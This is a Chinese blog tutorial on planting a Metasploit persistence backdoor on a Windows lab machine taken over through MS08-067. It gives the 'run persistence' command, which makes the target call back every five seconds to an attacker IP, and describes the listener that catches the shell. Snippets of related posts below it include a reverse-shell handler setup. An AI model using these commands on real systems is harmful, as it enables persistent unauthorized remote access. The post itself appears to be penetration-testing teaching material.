Kali 中 Persistence后门的使用

最新推荐文章于 2024-03-23 21:36:16 发布
最新推荐文章于 2024-03-23 21:36:16 发布
阅读量3.5k 收藏 18
点赞数 1
分类专栏: Kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/82313635
版权

这里我就用最经典的漏洞ms08_067进行演示

 

靶机:192.168.193.128

攻击机:192.168.193.135

 

这里我就省去ms08_067漏洞的使用过程,直接讲当ms08_067拿到shell之后的操作

 

这里我们已经拿到权限了

 

然后执行 run persistence -S -U -X -i 5 -p 446 -r 192.168.193.135

-S:系统启动时加载

-U:用户登陆时加载

-X:开机时自动加载

-i:回连的时间间隔

-r:你的接收shell的电脑IP

 

这样电脑在系统登陆,用户登陆,开机,使用中每个5秒都会回连你的机器

然后我们下次在登陆使用下面的漏洞利用模块和攻击载荷

这个模块就是负责监听的,记得设置下自己的IP和回连的端口

然后很快就会有回弹

大方子
关注
专栏目录
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4478
内网渗透系列之mimikatz的使用以及后门植入 文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
使用Kali Linux Metasploit 复现 word宏
xujing19920814的博客
10-01 1633
使用Kali Linux Metasploit 复现 宏
国外的kali usb persistence制作工具教程(亲测可用)
02-12
kali usb persistence制作工具打包以及详细视频教程。 不过教程是英文版,比较简单,容易懂的。。。。
MSF之Persistence后门
weixin_46104215的博客
09-27 2875
Persistence:一款使用安装自动方式的持久性后门程序,可以利用它创建注册和文件 一、实验环境 攻击主机:2021 Kali (ip:192.168.110.130) 靶机:win7(专业版) (ip:192.168.110.134) 准备:先通过攻击获取一个 meterpreter shell(之前的文章有介绍的 ms17-010漏洞) 二、实验步骤 1.获得 meterpreter shell 之后,输入 run persistence -A -S -U...
在Android使用带有shell脚本的Kali Linux的持久性后门
HTTPPTTH的博客
03-23 895
此外,如果目标系统与我们在同一局域网,或者我们拥有静态 IP,那么持久性将会一直存在于局域网或者广域网,这也是我们需要注意的一个问题。在破解 Android 设备时,可以使用多种方法,但是一旦获得了meterpreter会话,该会话并不是持久的,需要将一个 shell 脚本上传到/sdcard目录的任何位置来实现持久性后门。因此,我们需要使用另一种方法,即使用shell命令在/sdcard目录下上传一个后门,并执行脚本,该脚本会自动在该 Android 设备创建持久性后门。之后,需要在终端输入“
kali persistence 设置 (kali 1.0.9a) done!
hotday_Kevin的专栏
10-17 2512
一、将kali安装到U盘,建议使用
12.3、后渗透测试--持久化后门
无痕的博客
12-13 2572
metasploit后渗透测试--持久化后门
kali linux 支持什么编程语言_渗透过程可能要用到的Kali工具小总结
weixin_39576066的博客
10-24 2811
渗透过程可能要用到的Kali工具小总结写在最前面最近在搞渗透的时候,发现过程有一些kali工具还是很适合使用的所以写一个渗透过程可能用到的kali渗透工具的小小总结写的不对 多多包涵 各位大佬轻喷 :DKali用得好 牢饭准管饱渗透不规范 亲人两行泪先来了解一下Kali(From Wikipdeia)Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Of...
kali 单元07 渗透攻击
xiaoma920的博客
05-24 319
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。2、载入exploit/multi/browser/adobe_flash_hacking_team_uaf渗透模块,查看需要设置的参数并进行设置,启动模块。II: 检查apache2是否已经启动,没有则启动。
钓鱼网站+persistence植入后门程序+创建用户
小王的储物间
02-21 821
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
kali linux安装到U盘并增加persistence功能
weixin_30791095的博客
09-13 446
这里写两种方法,其实本质是一样的,都是利用grub4dos重新写mbr,同时建立persistence分区并写入配置文件。 一, 1,首先将U盘分区,分两个即可,一个可当U盘使用存储数据,另一个则用来当persistence盘,格式为ext4。 2,提取kali镜像所有文件到U盘分区根目录,用grub4dos或者bootice写进grub引导,并复制menu.lst以及GR...
kali persistence encryted!
qq898141731的博客
11-12 493
  #为u盘创建额外的分区 $parted (parted)print devices (parted)select /dev/sdb (parted)mkpart primary 起始 结束 (parted)quit   #luks 创建加密分区 $cryptsetup --verbose --verify-passphrase luksFormat /dev/sdb3 yes? ...
Kali Linux USB Live Persistence模式
热门推荐
Kylin_7的博客
05-11 2万+
Kali Linux USB Live Persistence
制作kali persistence U盘
淡水鱼
06-20 682
把之前写在空间的文章搬运过来...... 1.用diskimg……软件把镜像写入U盘,写入前将U盘格式化为fat32 2.从U盘启动到kali(L-U-P)系统…… 3.从控制台窗口输入:gparted,回车 4.后面的用图(写个教程都懒得这么清新脱俗,也是没sei了→_→)参考网上教程,特别注意的重点给出 5. 额(⊙o
u盘安装kali并且持久化
weixin_31501115的博客
06-21 6160
首先准备三个东东(提供的软件下载地址均为云盘地址,也可自行官网下载最新版) kali U盘ISO镜像:链接: https://pan.baidu.com/s/1n0eD4hs_KCplLmDu3b1ztA 提取码: 9zcw U盘烧入工具:链接: https://pan.baidu.com/s/1yNWJyTRfl6PkcwULJQDk3A 提取码: i59s 系统分区工具:链接: https://pan.baidu.com/s/1du7KTQ0n_dkjBRPnt_Ya1g 提取码: 5y5x开始烧制u盘
制作 Kali Linux 随身 U 盘并实现持久化
程序员「阿基米东」的编程之旅
08-27 1万+
制作 Kali Linux 随身 U 盘 Kali Linux 的前身是 BackTrack Linux 发行版。Kali Linux 是一个基于 Debian 的 Linux 发行版,包括很多安全和取证方面的相关工具。它由 Offensive Security Ltd 维护和资助,最先由 Offensive Security 的 MatiAharoni 和 Devon Kearns 通过重写 Back Track 来完成。Back Track 是基于 Ubuntu 的一个 Linux 发行版。 Kali
制作kali linux encrypted persistence (持久加密)U盘
Y_KolaFish_Y的博客
04-10 1555
Kali linux持久加密U盘制作 将镜像刻录到U盘 (你也可以直接在windows下用u盘写入工具如Win32DiskImager.exe来写入镜像文件 dd if=你所下载的kali镜像.iso of=/dev/sdb bs=1M bs指的是block size(块大小) 为U盘创建额外分区 parted 用kali自带的parted工具分区 print devices #找到你...
KALI)在U盘打造个性化PE工具箱+KALI(Persistence)+存储的工作站
易煜东的
05-25 7933
手上有个64G的U盘,单做PE工具箱或者单做Kali都会比较浪费,所以想到了实现PE工具箱+kali系统(带persistence功能)+存储三合一,试过各种方法,失败了很多次,总结了很多经验,所以此文章仅作为记录,有些无足轻重的部分会简单带过,关键步骤上会有详细描述,业余爱好,非计算机专业出身,可能思路和注重对会比较适合小白学习,大牛请轻喷。首先奉上效果图,制作过程比较急躁(失败次数太多了),所...
KALI】自制U盘版KALI(即插即用具有可持久化功能)
qq_25426559的博客
04-17 8137
本文介绍了如何制作U盘版即插即用的Kali,且配有持久化功能。
kali后门工具攻击的使用命令行展示
最新发布
10-11
Kali Linux这个著名的渗透测试系统,有许多后门工具可以用于攻击。不过请注意,这些工具主要用于安全研究和学习,而非非法活动。以下是几个常见的后门工具及其基本使用命令: 1. **Backdoor-Bin** (backdoor.sh): 这是一个简单的Linux后门创建工具,安装后通过`backdoor.sh`命令执行。 ```bash $ sudo apt-get install backdoor-bin $ backdoor.sh -h # 查看帮助文档了解如何设置和激活后门 $ ./backdoor.sh [目标主机IP] [用户名] [密码] # 创建并激活后门 ``` 2. **Ettercap** (ettercap): 可以进行网络监听、欺骗等操作,通过`ettercap`命令加上相应的模块来设置后门。 ```bash $ sudo apt-get install ettercap $ ettercap -T # 激活监听模式,选择需要的模块如 man-in-the-middle 攻击 ``` 3. **Metasploit Framework** (msfconsole): 是一款强大的漏洞利用工具,可以创建和管理后门,通过`msfconsole`进行操作: ```bash $ sudo apt-get install metasploit-framework $ msfconsole use exploit/multi/handler set payload linux/x86/shell_reverse_bash set lhost <your-ip> exploit # 如果成功,会生成一个后门连接地址 ``` 这些命令展示了基本的使用方法,实际操作时需谨慎,并确保遵守道德规范和法律法规。同时,后门技术应在授权和受控环境使用,以维护网络安全。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值